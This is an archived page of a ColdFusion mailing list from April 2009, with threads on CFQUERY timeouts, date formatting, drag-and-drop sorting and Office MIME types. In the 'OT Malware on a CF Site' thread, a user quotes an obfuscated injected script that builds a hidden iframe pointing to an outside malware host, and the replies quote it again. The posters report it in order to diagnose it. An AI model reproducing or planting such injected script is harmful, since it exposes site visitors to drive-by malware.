Re: Java now available on Google App engine - how long til CFML?

2009-04-15 Thread Tom Chiverton
On Friday 10 Apr 2009, Rick Mason wrote: I suspect it will happen and it will be one of the open source distros. The next Ubuntu should, for instance. -- Helping to simultaneously visualize functionalities as part of the IT team of the year, '09 and '08 Tom Chiverton Developer Tel: +44

Re: Server Monitoring

2009-04-15 Thread Tom Chiverton
On Tuesday 14 Apr 2009, Rob Parkhill wrote: although I am not sure if that is possible with CF. The other thing I could test would be the connection to the database, but I can't seem to find the references to accessing the admin tools in CF8, where I thought that would be possible, so any

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Sung Woo
Anyone? Bueller? I really need an answer to this -- even though I'm running Fusion Reactor and can keep a survival strategy, this is no way to keep a server running. Is there anyone out there who's successfully used the TIMEOUT parameter in CFQUERY with CFMX 7.0.2 and SQL 2005 Standard?

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Casey Dougall
On Tue, Apr 14, 2009 at 5:25 PM, Sung Woo s...@cornell.edu wrote: Hi Casey, What happened today is that the SQL server basically locked up. CF kept waiting for the request to come back, but it never did because it just hung infinitely. It seems as if CF waits forever in a case like this,

Newbie ... Date / Time formatting

2009-04-15 Thread BobSharp
I am having a problem with erroneous MINUTES in my DateTime creation/formatting. The rest of the DateTime comes out correctly.LINK OUTPUT ... Date Formatting tests vStartDate = 01/01/2000 vEndDate = 14/4/2009 CreateDateTime (vStartDate) = {ts

RE: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Mark Kruger
The query timeout is not designed to work when there is no connection at all to the DB server. It is designed to time the statement - so if the connection itself is lost the setting will not have any affect. In affect you have an orphaned thread out there that is taking up space in the running

Looking for a CF drag drop tutorial

2009-04-15 Thread Maya MacDonald
Hi, I am looking for a CF tutorial on how to create a drag and drop list to reorder entries. Thanks! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial

Re: Newbie ... Date / Time formatting

2009-04-15 Thread James Holmes
You can't output a time with dateformat() - you need to use timeformat() for that bit. mxAjax / CFAjax docs and other useful articles: http://www.bifrost.com.au/blog/ 2009/4/15 BobSharp bobsh...@ntlworld.com: I am having a problem with erroneous MINUTES in my DateTime creation/formatting.

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Robert Rawlins
This is an interesting thread, I've seen what I believe to be very similar behaviour here on one of my webservices, seemed that one particular query sometimes just hangs indefinitly, however other threads and requests are all just fine. I tried playing around with application request

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Sung Woo
Mark and Casey, Thanks for clarifying this for me. I don't own the SQL Server that I need to hit, so it looks like I'm between a rock and a hard place. I still don't think the TIMEOUT parameter is working, though. In my example, I'm hitting a database that is fully operational, and I have a

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Sung Woo
Also -- this may just be me being dense, but I don't get why the TIMEOUT feature in CFQUERY has to work this way. It's CF that's making the initial request to the datasource, so it should start counting down from the moment it creates that request. And then after waiting for a predetermined

Re: Looking for a CF drag drop tutorial

2009-04-15 Thread Tom Chiverton
On Wednesday 15 Apr 2009, Maya MacDonald wrote: I am looking for a CF tutorial on how to create a drag and drop list to reorder entries. You want a client-side solution, like JavaScript, of course, not a server-side one like ColdFusion. I'm sure YUI, jQuery etc. all support this. -- Helping

Re: Looking for a CF drag drop tutorial

2009-04-15 Thread Ryan Stille
Maya MacDonald wrote: Hi, I am looking for a CF tutorial on how to create a drag and drop list to reorder entries. Thanks! You may find this useful: http://www.stillnetstudios.com/2006/12/31/drag-and-drop-sort-order-with-scriptaculous/ It shows how to pass the resorted values back

Re: Unable to access CF Admin

2009-04-15 Thread Toby King
Still unable to access CF Administrator Does anyone know if it can be done. Happy to pay consulting fees to get fixed Here is the entire httpd-vhosts.conf So I do already have the Alias in the file. # # Virtual Hosts # # If you want to maintain multiple domains/hostnames on your #

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Sung Woo
Hi Mark, To answer your question -- there's a DDL transaction that's running on the server, and from what the folks have told me, an ALTER TABLE command was causing the lock to occur. And the downside is that giving hints (i.e., WITH (NOLOCK)) is not going to have an effect in this

RE: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Mark Kruger
For an ALTER TABLE to have this affect it would need to be running on a table that you were trying to access. Dropping and adding columns (if that is what was happening) on production tables will cause lots of problems - and not just with CF. It should be done infrequently and very carefully. I

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Matthew Williams
The docs say, no, it may not timeout at 1 second. Check out the livedocs... Because the timeout attribute only affects the maximum time for each suboperation of a query, the cumulative time may exceed its value. And, even then, the query stuff is considered to be 3rd party (or at least, so

show x words not x characters

2009-04-15 Thread Glyn Jackson
Ho every one, bit of a simple question, my website shows a snippet of text using the 'left(myvar,30)' function in ColdFusion. however this some times cuts off words mid flow, is there a function in CF that shows x words and not x characters? thanks in advance

RE: show x words not x characters

2009-04-15 Thread Adrian Lynch
Treat the string as a list with any chars you see fit to be word delimiters, so spaces, tabs, full stops etc, then extract N elements from the left of the list. Adrian -Original Message- From: Glyn Jackson [mailto:glyn.jack...@newebia.co.uk] Sent: 15 April 2009 17:02 To: cf-talk

Re: show x words not x characters

2009-04-15 Thread Gerald Guido
There should be a UDF for that @ cflib.org I would search for word count or some such. G! On Wed, Apr 15, 2009 at 12:01 PM, Glyn Jackson glyn.jack...@newebia.co.ukwrote: Ho every one, bit of a simple question, my website shows a snippet of text using the 'left(myvar,30)' function in

SQL Server Locks

2009-04-15 Thread Dan Baughman
Hi All, SQL Server locks seem to cause problems that result in processes remaining blocked until something intervenes in two cases: circular dependencies between processes and application or when a query is cancelled but the lock isn't released. My question pertains to the latter. Has anyone

Re: show x words not x characters

2009-04-15 Thread Glyn Jackson
There should be a UDF for that @ cflib.org I would search for word count or some such. G! On Wed, Apr 15, 2009 at 12:01 PM, Glyn Jackson glyn.jack...@newebia.co.ukwrote: thanks ~| Adobe® ColdFusion® 8 software 8 is the

Re: show x words not x characters

2009-04-15 Thread Peter Boughton
A sentence is effectively a space-delimited list of words. So just do ListLeft(myvar,5,' ') However, words can be an unpredictable length, so this might not be exactly what you want. Here's some code that will give the first 100 characters, keeping words whole, and adding a html ellipsis

Re: Unable to access CF Admin

2009-04-15 Thread Gerald Guido
I didn't read the thread or if it is related but I had an issue where I changed the root dir that CF admin was in and I had to change a mapping to the CFIDE dir in the neo.xml Like I said... just a shot in the dark. G On Wed, Apr 15, 2009 at 11:32 AM, Toby King ptansw...@gmail.com wrote:

Re: CFQUERY Timeout for SQL2005 Fails

2009-04-15 Thread Sung Woo
Check this out. This one, as I've said before, outputs a number around 3000. cfquery name=test datasource=dsn timeout=1 select top 2 * from table/cfquery cfoutput#cfquery.ExecutionTime#/cfoutput However, this one results in an error: Error Executing Database Query.

Convert RGB values

2009-04-15 Thread Pranathi Reddy
Hi All.. I have a quick qn.. How do we convert RGB input text data to hex or color in coldfusion. Do we have any inbuilt function or we need to use javascript for that. Thanks, Pranathi ~| Adobe® ColdFusion® 8 software 8 is

Re: Convert RGB values

2009-04-15 Thread Raymond Camden
http://cflib.org/udf/RGBtoHex On Wed, Apr 15, 2009 at 1:03 PM, Pranathi Reddy rk.prana...@gmail.com wrote: Hi All.. I have a quick qn.. How do we convert RGB input text data to hex or color in coldfusion. Do we have any inbuilt function or we need to use javascript for that. Thanks,

Re: Looking for a CF drag drop tutorial

2009-04-15 Thread Tony Bentley
Hi, I am looking for a CF tutorial on how to create a drag and drop list to reorder entries. Thanks! This is not tested but it should offer an idea of how to get a sort working with jquery. Send me an email offline if you need more help. t...@tonybentley.com Javascript script

Re: Convert RGB values

2009-04-15 Thread Pranathi Reddy
Thanks for your help Raymond. http://cflib.org/udf/RGBtoHex ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f

Re: Looking for a CF drag drop tutorial

2009-04-15 Thread Tony Bentley
Wow, I can already see some errors. The ajaxproxy name is wrong, should be ASort. There are some others too so you will need to know a few things about jquery and cfajaxproxy to CFC first. ~| Adobe® ColdFusion® 8 software 8

Re: Newbie ... Date / Time formatting

2009-04-15 Thread BobSharp
Was actually trying to find a way of using DateTime fields in queries. Just found TIMESTAMP type for CFQueryParam. CFqueryparam cfsqltype=cf_sql_timestamp It was the DATE type that was causing the errors in the comparisons. CFqueryparam cfsqltype=cf_sql_date - Original Message -

MS WORD DOCX Question

2009-04-15 Thread Developer MediaDoc
Hi All, I have a working app that lets users upload docs to a clients 'admin' people. Recently a few users have been uploading MS OFFICE 2008, MS WORD .docx files. The 'admin' people dont have this latest version, but have downloaded the compatibility pack that lets them open them. Trouble

re: MS WORD DOCX Question

2009-04-15 Thread Jason Fisher
Some notes on the right MIME type for the Office 2007 formats, which IIS6 doesn't know how to handle. http://www.jameskovacs.com/blog/ConfiguringIIS6ToServeOffice2007FileFormats. aspx ~| Adobe® ColdFusion® 8 software 8 is

Re: MS WORD DOCX Question

2009-04-15 Thread Developer MediaDoc
Thanks Jason, that indeed provided the solution. I used the following two articles to setup the new mime types. http://sensisbledefault.wordpress.com/2007/03/05/office-2007-iis-6-mime-types-docx-pptx-xlsx/ http://support.microsoft.com/kb/936496 (This third described added MIME TYPES in

Mura CMS (was Sava CMS) on Connect preso now

2009-04-15 Thread Robert Munn
If you are interested in Mura CMS, tune in to see the presentation by Sean Schroeder of Blue River... http://experts.na3.acrobat.com/r67797209/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to

OT Malware on a CF Site

2009-04-15 Thread Terry Troxel
Has anyone seen anything like this written to any of your sites? script!-- var applstrna0 = if; var applstrna1 = rame src=http://said7;; var applstrna2 = .com/bb/faq.htm; var applstrna3 = width=100 height=0/i; var applstrna4 = frame;

Re: OT Malware on a CF Site

2009-04-15 Thread Maureen
Yeah..it's a hack. There is a lengthy thread about it here: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164 On Wed, Apr 15, 2009 at 7:12 PM, Terry Troxel te...@it-werks.com wrote: Has anyone seen anything like this written to any of your sites?

Re: OT Malware on a CF Site

2009-04-15 Thread Dave Watts
Has anyone seen anything like this written to any of your sites? script!--       var applstrna0 = if;       var applstrna1 = rame src=http://said7;;       var applstrna2 = .com/bb/faq.htm;       var applstrna3 = width=100 height=0/i;       var applstrna4 = frame;

RE: OT Malware on a CF Site

2009-04-15 Thread Terry Troxel
Thank you guys. I guess I searched everywhere but House of Fusion. I shoulda known. Terry -Original Message- From: Terry Troxel [mailto:te...@it-werks.com] Sent: Wednesday, April 15, 2009 7:13 PM To: cf-talk Subject: [SPAM-HIGH] OT Malware on a CF Site Has anyone seen anything like

Re: OT Malware on a CF Site

2009-04-15 Thread Ras Tafari
wow. thats slick. On Wed, Apr 15, 2009 at 10:12 PM, Terry Troxel te...@it-werks.com wrote: Has anyone seen anything like this written to any of your sites? script!--       var applstrna0 = if;       var applstrna1 = rame src=http://said7;;       var applstrna2 = .com/bb/faq.htm;